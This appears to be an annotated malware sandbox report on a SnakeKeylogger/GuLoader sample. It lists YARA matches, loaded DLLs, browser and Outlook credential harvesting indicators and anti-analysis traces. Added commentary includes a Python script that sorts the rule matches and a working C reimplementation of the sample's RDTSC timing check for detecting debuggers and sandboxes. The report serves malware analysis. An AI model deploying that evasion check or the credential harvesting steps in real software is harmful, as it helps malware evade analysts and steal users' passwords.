                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
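The two "Matched rule" tables above list the same three YARA rules against a dozen dumps of one process, which hides the useful fact: only some regions match all three rules, and those are the fully unpacked payload copies worth pulling first. The following is an added example, not part of the report and not Joe Sandbox tooling, that folds the rows into a per-region view. Its sample rows are copied from this report. The meaning it assigns to the dump-name fields (process index, phase, image, base address, dump index for `.unpack` names; the fourth dotted field of an `.sdmp` name as the base address) is inferred from the naming pattern and is an assumption; it handles only the rows that carry an `Author:` column, not the metadata rows that follow them.

```python
"""Fold Joe Sandbox "Matched rule" rows into a per-region view.

Added example; not part of the report and not Joe Sandbox tooling. Sample rows
are copied from this report. The field meanings assumed for dump names are
inferred from the naming pattern and are an assumption.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

SAMPLE_ROWS = """\
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
"""

# Text exports fuse the type and "Matched rule" columns ("UNPACKEDPEMatched");
# accept that as well as a " | " separated row.
ROW_RE = re.compile(
    r"^Source: (?P<src>.+?), type: (?P<kind>[A-Z]+?)(?: \| )?Matched rule: "
    r"(?P<rule>.+?) Author: (?P<author>.+)$"
)
# <proc>.<phase>.<image>.<base hex>.<dump idx>.[raw.]unpack (assumed field meanings)
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<phase>\d+)\.(?P<image>.+)\.(?P<base>[0-9a-fA-F]+)\."
    r"(?P<idx>\d+)\.(?P<raw>raw\.)?unpack$"
)


def region_key(src: str) -> str:
    """Normalise a dump name to its load address, so PE dumps and raw memory dumps
    of the same region land in one bucket."""
    m = UNPACK_RE.match(src)
    if m:
        return "0x%08X" % int(m.group("base"), 16)
    if src.endswith(".sdmp"):
        parts = src.split(".")
        if len(parts) == 9:
            return "0x%08X" % int(parts[3], 16)
    m = re.search(r"PID: (\d+)", src)
    if m:
        return "pid:" + m.group(1)
    return src


def summarize(rows: str) -> Tuple[Dict[str, Set[str]], Dict[str, Set[str]]]:
    """Return (rules per region, regions per rule); rows the regex does not recognise are skipped."""
    by_region: Dict[str, Set[str]] = defaultdict(set)
    by_rule: Dict[str, Set[str]] = defaultdict(set)
    for line in rows.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        key = region_key(m.group("src"))
        by_region[key].add(m.group("rule"))
        by_rule[m.group("rule")].add(key)
    return by_region, by_rule


def best_carve_targets(by_region: Dict[str, Set[str]]) -> List[str]:
    """Regions that hit every rule seen anywhere: the most complete payload copies,
    and therefore the dumps to pull first for static analysis."""
    all_rules: Set[str] = set().union(*by_region.values())
    return sorted(k for k, rules in by_region.items() if rules == all_rules)


if __name__ == "__main__":
    by_region, by_rule = summarize(SAMPLE_ROWS)
    for region in sorted(by_region):
        print(region, sorted(by_region[region]))
    print("carve first:", best_carve_targets(by_region))
```

On the rows above this yields 0x360E0000 and 0x36720000 as the regions that match all three rules, matching the two 0x08000000-typed dumps (3480673346 and 3480962363) that also carry the reallyfreegeoip.org string; the low-address dumps (0x000AFA4E, 0x000B096E, 0x0006F000) only trigger the Elastic rule and are the partial copies.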
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, -A-.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, -A-.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, -A-.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/5@5/5
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C (this is the standard NSIS installer stub entry routine; the AdjustTokenPrivileges/ExitWindowsEx pair is the stub's reboot-on-finish support and is what triggers the "shutdown / reboot" signature)
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_00402104 CoCreateInstance,0_2_00402104
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File created: C:\Users\user\AppData\Local\Temp\nsj84F3.tmp
Source: MC8017774DOCS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003416B000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003412B000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003415E000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.000000003411B000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000034139000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key)); (this is the schema of the password_notes table in a Chromium-based browser's "Login Data" SQLite database, read here as part of browser credential harvesting)
Source: MC8017774DOCS.exe | ReversingLabs: Detection: 42%
Source: MC8017774DOCS.exe | Virustotal: Detection: 48%
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File read: C:\Users\user\Desktop\MC8017774DOCS.exe
Source: unknown | Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Process created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (the Outlook profile subkey that holds per-account settings; stealers read it for mail credentials, which is the basis of the "steal Mail credentials" signature)
Source: MC8017774DOCS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mshtml.pdb source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: _.pdb source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp

                    Data Obfuscation

Source: Yara match | File source: 00000000.00000002.2522664351.00000000037E7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2522145206.0000000000848000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MC8017774DOCS.exe PID: 7084, type: MEMORYSTR
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_6E9B1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E9B1B63
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_6E9B2FD0 push eax; ret 0_2_6E9B2FFE
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File created: C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll (System.dll in an nsXXXX.tmp directory is the NSIS "System" plug-in, which lets installer script call arbitrary Win32 APIs; the GetModuleHandleW/LoadLibraryW/GetProcAddress sequence at 0_2_6E9B1B63 is that plug-in resolving API names at runtime)
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Process information set: NOOPENFILEERRORBOX (73 identical entries)

                    Malware Analysis System Evasion

Source: C:\Users\user\Desktop\MC8017774DOCS.exe | API/Special instruction interceptor: Address: 38283BF
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | API/Special instruction interceptor: Address: 21F83BF
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | RDTSC instruction interceptor: First address: 37BE195 second address: 37BE195 instructions:
    0x00000000 rdtsc
    0x00000002 test cl, al
    0x00000004 cmp ebx, ecx
    0x00000006 jc 00007F56CC73E051h
    0x00000008 test ch, dh
    0x0000000a test bx, dx
    0x0000000d inc ebp
    0x0000000e cmp ecx, eax
    0x00000010 inc ebx
    0x00000011 rdtsc
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | RDTSC instruction interceptor: First address: 218E195 second address: 218E195 instructions:
    0x00000000 rdtsc
    0x00000002 test cl, al
    0x00000004 cmp ebx, ecx
    0x00000006 jc 00007F56CD2809B1h
    0x00000008 test ch, dh
    0x0000000a test bx, dx
    0x0000000d inc ebp
    0x0000000e cmp ecx, eax
    0x00000010 inc ebx
    0x00000011 rdtsc
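The two RDTSC traces above show the loader's timing check: the time-stamp counter is read, a few filler instructions run (the test/cmp/inc padding is typical GuLoader anti-disassembly junk), a conditional branch decides whether to loop, and the counter is read again. A large difference between the two reads means the code was interrupted between them by single-stepping, an RDTSC hook or a VM exit, which the sample treats as evidence of analysis. The C program below is an added illustration of that check written for this page; it is not code from the sample or from Joe Sandbox. The threshold, the sample count and the filler loop are assumptions, and on non-x86 builds it falls back to a monotonic clock so it still runs.

```c
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* Read the time-stamp counter with RDTSC on x86; on other architectures
 * fall back to a monotonic nanosecond clock so the example still runs. */
static inline uint64_t read_tsc(void) {
#if defined(__x86_64__) || defined(__i386__)
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/* One measurement: two counter reads around a short stretch of filler work.
 * The loader pads this stretch with junk instructions (test/cmp/inc in the
 * trace above) so the pair of reads is harder to spot statically. */
static uint64_t measure_once(void) {
    volatile uint32_t sink = 0;            /* volatile: keep the filler loop */
    uint64_t t0 = read_tsc();
    for (uint32_t i = 0; i < 64; i++) sink += i;
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

/* Pure decision logic, kept separate so it is testable: a delta above the
 * threshold means something (single-stepping, an RDTSC hook, a VM exit on
 * RDTSC) interrupted the two reads, which the evasion treats as "watched". */
int tsc_delta_suspicious(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

/* Take the minimum over several samples so a single scheduler preemption
 * does not produce a false "instrumented" verdict. */
uint64_t min_tsc_delta(int samples) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < samples; i++) {
        uint64_t d = measure_once();
        if (d < best) best = d;
    }
    return best;
}

int main(void) {
    const uint64_t threshold = 100000;     /* assumed; real loaders tune this per CPU */
    uint64_t d = min_tsc_delta(16);
    printf("min RDTSC delta over 16 samples: %llu -> %s\n",
           (unsigned long long)d,
           tsc_delta_suspicious(d, threshold) ? "instrumented" : "looks native");
    return 0;
}
```

Hooking or trapping RDTSC to hide the analysis environment is itself what inflates the delta, which is why the sandbox logs the instruction pair instead of emulating it: the defender's options are either TSC offsetting in the hypervisor so the reads stay consistent, or patching the branch after the compare once the loop has been located.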
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Memory allocated: 33AC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Memory allocated: 33D30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Memory allocated: 33B50000 memory reserve | memory write watch (MEM_WRITE_WATCH reservations are also made routinely by the .NET garbage collector, and this process loads mscoree.dll and the CLR runtime DLLs above, so on their own these three entries are weak evidence of evasion)
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 922337203685477 (this value is 2^63 100-ns units expressed in milliseconds, the delay interval Windows uses for Sleep(INFINITE); it is an unbounded wait, not a 29,000-year timer)
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599766
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599438
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599313
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599188
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 599063
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598952
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598844
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598719
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598609
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598500
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598389
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598281
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598172
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 598063
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597938
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597828
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597719
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597594
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597484
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597374
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597266
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597156
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 597047
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596938
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596813
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596703
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596594
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596469
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596358
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596250
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596141
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 596031
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595922
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595813
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595688
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595578
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595469
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595344
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595234
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 595105
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594946
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594842
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594734
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594625
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594515
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Thread delayed: delay time: 594406
Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Window / User API: threadDelayed 7749
